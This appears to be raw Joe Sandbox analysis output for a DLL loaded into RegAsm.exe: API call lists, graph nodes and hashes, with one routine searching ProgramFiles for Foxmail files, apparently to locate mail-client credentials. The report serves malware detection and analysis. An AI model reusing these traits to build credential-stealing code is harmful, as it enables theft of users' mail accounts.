IsProcessorFeaturePresent 5964->5966 5967 100055e0 5964->5967 5969 100055cd 5966->5969 6191 10004bc1 5967->6191 6185 100060e2 5969->6185 5974 10005c71 5972->5974 5975 10005c75 __crt_fast_encode_pointer 5972->5975 5974->5975 5983 10005ce1 5974->5983 5975->5937 5977 10002ae3 5976->5977 5978 10002ae5 IsProcessorFeaturePresent 5976->5978 5977->5940 5980 10002b58 5978->5980 5990 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5980->5990 5982 10002c3b 5982->5940 5984 10005d02 LoadLibraryExW 5983->5984 5989 10005cf7 5983->5989 5985 10005d1f GetLastError 5984->5985 5988 10005d37 5984->5988 5986 10005d2a LoadLibraryExW 5985->5986 5985->5988 5986->5988 5987 10005d4e FreeLibrary 5987->5989 5988->5987 5988->5989 5989->5974 5990->5982 5996 10004793 5991->5996 5993 10004765 5994 10002ada _ValidateLocalCookies 5 API calls 5993->5994 5995 1000478f 5994->5995 5995->5947 5997 1000479f ___DestructExceptionObject 5996->5997 6002 10005671 RtlEnterCriticalSection 5997->6002 5999 100047aa 6003 100047dc 5999->6003 6001 100047d1 _abort 6001->5993 6002->5999 6006 100056b9 RtlLeaveCriticalSection 6003->6006 6005 100047e3 6005->6001 6006->6005 6013 10005854 6007->6013 6009 10005938 6010 100058c4 6009->6010 6024 10005758 6010->6024 6012 100058e8 6012->5887 6014 10005860 ___DestructExceptionObject 6013->6014 6019 10005671 RtlEnterCriticalSection 6014->6019 6016 1000586a 6020 10005890 6016->6020 6018 10005888 _abort 6018->6009 6019->6016 6023 100056b9 RtlLeaveCriticalSection 6020->6023 6022 1000589a 6022->6018 6023->6022 6025 10005764 ___DestructExceptionObject 6024->6025 6032 10005671 RtlEnterCriticalSection 6025->6032 6027 1000576e 6033 10005a7f 6027->6033 6029 10005786 6037 1000579c 6029->6037 6031 10005794 _abort 6031->6012 6032->6027 6034 10005ab5 __fassign 6033->6034 6035 10005a8e __fassign 6033->6035 6034->6029 6035->6034 6040 10007cc2 6035->6040 6154 100056b9 RtlLeaveCriticalSection 6037->6154 6039 100057a6 6039->6031 6041 10007d42 
6040->6041 6045 10007cd8 6040->6045 6042 10007d90 6041->6042 6044 1000571e _free 19 API calls 6041->6044 6108 10007e35 6042->6108 6046 10007d64 6044->6046 6045->6041 6047 10007d0b 6045->6047 6052 1000571e _free 19 API calls 6045->6052 6048 1000571e _free 19 API calls 6046->6048 6049 10007d2d 6047->6049 6054 1000571e _free 19 API calls 6047->6054 6050 10007d77 6048->6050 6051 1000571e _free 19 API calls 6049->6051 6053 1000571e _free 19 API calls 6050->6053 6055 10007d37 6051->6055 6057 10007d00 6052->6057 6060 10007d85 6053->6060 6061 10007d22 6054->6061 6062 1000571e _free 19 API calls 6055->6062 6056 10007dfe 6063 1000571e _free 19 API calls 6056->6063 6068 100090ba 6057->6068 6058 10007d9e 6058->6056 6066 1000571e 19 API calls _free 6058->6066 6064 1000571e _free 19 API calls 6060->6064 6096 100091b8 6061->6096 6062->6041 6067 10007e04 6063->6067 6064->6042 6066->6058 6067->6034 6069 100090cb 6068->6069 6095 100091b4 6068->6095 6070 100090dc 6069->6070 6072 1000571e _free 19 API calls 6069->6072 6071 100090ee 6070->6071 6073 1000571e _free 19 API calls 6070->6073 6074 10009100 6071->6074 6075 1000571e _free 19 API calls 6071->6075 6072->6070 6073->6071 6076 10009112 6074->6076 6077 1000571e _free 19 API calls 6074->6077 6075->6074 6078 10009124 6076->6078 6080 1000571e _free 19 API calls 6076->6080 6077->6076 6079 10009136 6078->6079 6081 1000571e _free 19 API calls 6078->6081 6082 10009148 6079->6082 6083 1000571e _free 19 API calls 6079->6083 6080->6078 6081->6079 6084 1000571e _free 19 API calls 6082->6084 6087 1000915a 6082->6087 6083->6082 6084->6087 6085 1000916c 6086 1000917e 6085->6086 6089 1000571e _free 19 API calls 6085->6089 6090 10009190 6086->6090 6091 1000571e _free 19 API calls 6086->6091 6087->6085 6088 1000571e _free 19 API calls 6087->6088 6088->6085 6089->6086 6092 100091a2 6090->6092 6093 1000571e _free 19 API calls 6090->6093 6091->6090 6094 1000571e _free 19 API calls 6092->6094 6092->6095 6093->6092 6094->6095 6095->6047 6097 100091c5 

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
• lstrcatW.KERNEL32(?,?), ref: 10001151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
• FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
• FindClose.KERNEL32(00000000), ref: 100011DB
Memory Dump Source
• Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
• Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                • API String ID: 672098462-2938083778

                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1414292761-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2905821283-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3177248105-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2905821283-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual$HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3519776433-0

                                                                                                                                                                                Control-flow Graph: entry block 10006acb-10006aff, nodes 214-249; API node: GetCPInfo
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Info
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1807457897-3916222277

                                                                                                                                                                                Control-flow Graph: entry block 10005f19-10005f3b, nodes 250-258; API node: LCMapStringW
                                                                                                                                                                                APIs
                                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: String
                                                                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                                                                • API String ID: 2568140703-3893581201

                                                                                                                                                                                Control-flow Graph: entry block 10005d5c-10005d7e, nodes 262-267; API node: TlsAlloc
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Alloc
                                                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                                                • API String ID: 2773662609-671089009

                                                                                                                                                                                Control-flow Graph: entry block 10003af1-10003b06, nodes 272-276; API node: TlsAlloc
                                                                                                                                                                                APIs
                                                                                                                                                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: try_get_function
                                                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                                                • API String ID: 2742660187-671089009

                                                                                                                                                                                Control-flow Graph: entry block 10006e20-10006e44, nodes 279-333; API nodes: IsValidCodePage, GetCPInfo
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 546120528-0

                                                                                                                                                                                Control-flow Graph: entry block 10006c5f-10006c89, nodes 336-371
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                                • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2991157371-0
                                                                                                                                                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50

                                                                                                                                                                                APIs
                                                                                                                                                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3750050125-0
                                                                                                                                                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 806969131-0
                                                                                                                                                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                                APIs
                                                                                                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __crt_fast_encode_pointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3768137683-0
                                                                                                                                                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
